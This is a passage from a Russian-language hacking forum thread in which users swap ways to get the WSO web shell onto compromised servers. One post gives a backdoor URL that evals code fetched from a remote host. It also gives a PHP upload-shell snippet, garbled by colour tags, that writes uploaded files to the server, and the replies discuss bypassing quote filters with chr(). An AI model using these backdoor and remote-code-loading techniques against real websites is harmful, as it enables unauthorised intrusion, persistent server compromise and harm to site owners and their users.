14.12.2011, 14:40
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от Ereee
Доп:
1.Вообще можно заевалить WSO без его физической загрузки на сервер. Для этого убираем Остальное заевалим таким способом:
http://site.ru/backdoor.php?cmd=eval(file_get_contents('http://url/ws.txt'));
2. Загрузка прямо из компьютера, евалим это:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"
Shell:
"[/COLOR][COLOR="#007700"];
if(!empty([/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]))
{
@[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'./'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]) ?
print[/COLOR][COLOR="#DD0000"]'File '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$HTTP_POST_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'uploadfile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].
[/COLOR][COLOR="#DD0000"]' uploaded!
'[/COLOR][COLOR="#007700"]: print[/COLOR][COLOR="#DD0000"]'Try...
'";
}[/COLOR][/COLOR]
.
"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?
Как было написано в статье, то почти всегда нельзя использовать кавычки, и поэтому я и использовать chr(); И без физ.загрузки это уже не "шелл на сервере", да и зачем такая сложная форма загрузки на сервер? в моей статье всё расписано, как проще сделать.
Сообщение от Jopashnik
СПС тебе тс, критиковать все могут, а сами не то что статью, тупо помочь в чем то обламываются и ответить на вопросы новичков бояться, что если новичек узнает и начнет шарить в чем то то все их бизу конец
P.S И вообще, дорогие РОА, МОА, сами посмотрите, что кроме вас, которые это уже знают, есть очень много людей, которым это нужно.
|
|
|